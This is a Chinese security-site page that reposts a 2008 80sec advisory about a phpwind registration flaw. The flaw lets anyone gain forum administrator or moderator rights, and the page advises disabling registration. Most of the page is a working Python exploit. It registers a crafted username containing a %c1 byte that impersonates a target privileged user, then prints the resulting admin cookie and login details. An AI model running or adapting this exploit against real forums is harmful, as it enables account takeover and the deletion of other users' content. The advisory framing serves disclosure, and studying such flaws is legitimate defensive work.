首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
80sec发现的phpwind注册漏洞
来源:http://www.80sec.com/ 作者:jianxin 发布时间:2008-06-02  

漏洞发布:http://www.80sec.com/

漏洞作者:jianxin@80sec.com

漏洞厂商: http://www.phpwind.com/
  PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问
速度和卓越的负载能力而深受国内外朋友的喜爱。
  本漏洞影响phpwind所有版本

漏洞危害:高

漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.com有提供exploit

漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限

漏洞修补:建议关闭注册功能等待官方出补丁

漏洞状态:08.5.25发现此漏洞
   08.6.1由80sec.com公开此漏洞
   暂无补丁

漏洞测试:

[code]
# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)


def banner():
    print ""
    print "########################################################"
    print "Phpwind所有版本管理权限泄露漏洞利用poc"
    print "Copyright (C) 2006"
    print "jianxin@80sec.com"
    print "80sec是一个新的致力于web安全的小团体"
    print "http://www.80sec.com"

def usage():
    banner()
    print "Usage:\n"
    print "   $ ./phpwind.py pwforumurl usertoattack\n"
    print "   pwforumurl 目标论坛地址如http://www.80sec.com/"
    print "   usertoattack 目标拥有权限的斑竹或管理员"
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
    print "   最新版本可以使用uid登陆"
    print "   其他版本可以使用cookie+useragent登陆"
    print "########################################################"
    print ""


argvs=sys.argv
usage()


data = "regname=%s
%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2"
% (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
 url     = pwurl ,
        headers = {'Content-Type' : 'application/x-www-form-
urlencoded','User-Agent': '80sec owned this'},
        data    = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
 if cookie.index('winduser'):
  print "Exploit Success!"
  print "Login with uid password @80sec or Cookie:"
  print cookie
  print "User-agent: 80sec owned this"
except:
 print "Error! http://www.80sec.com"
 print "Connect root#80sec.com"
[/code]


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP Booking Calendar 10 d (fck
·freeSSHd 1.2.1 Remote Stack Ov
·Now SMS/MMS Gateway 5.5 Remote
·Joomla Component com_biblestud
·ASUS DPC Proxy 2.0.0.16/19 Rem
·Samba (client) receive_smb_raw
·Mambo Component mambads <= 1.
·Joomla Component com_mycontent
·CMS from Scratch <= 1.1.3 (fck
·SecurityGateway 1.0.1 (usernam
·SyntaxCMS <= 1.3 (fckeditor)
·Joomla Component JooBB 0.5.9 B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved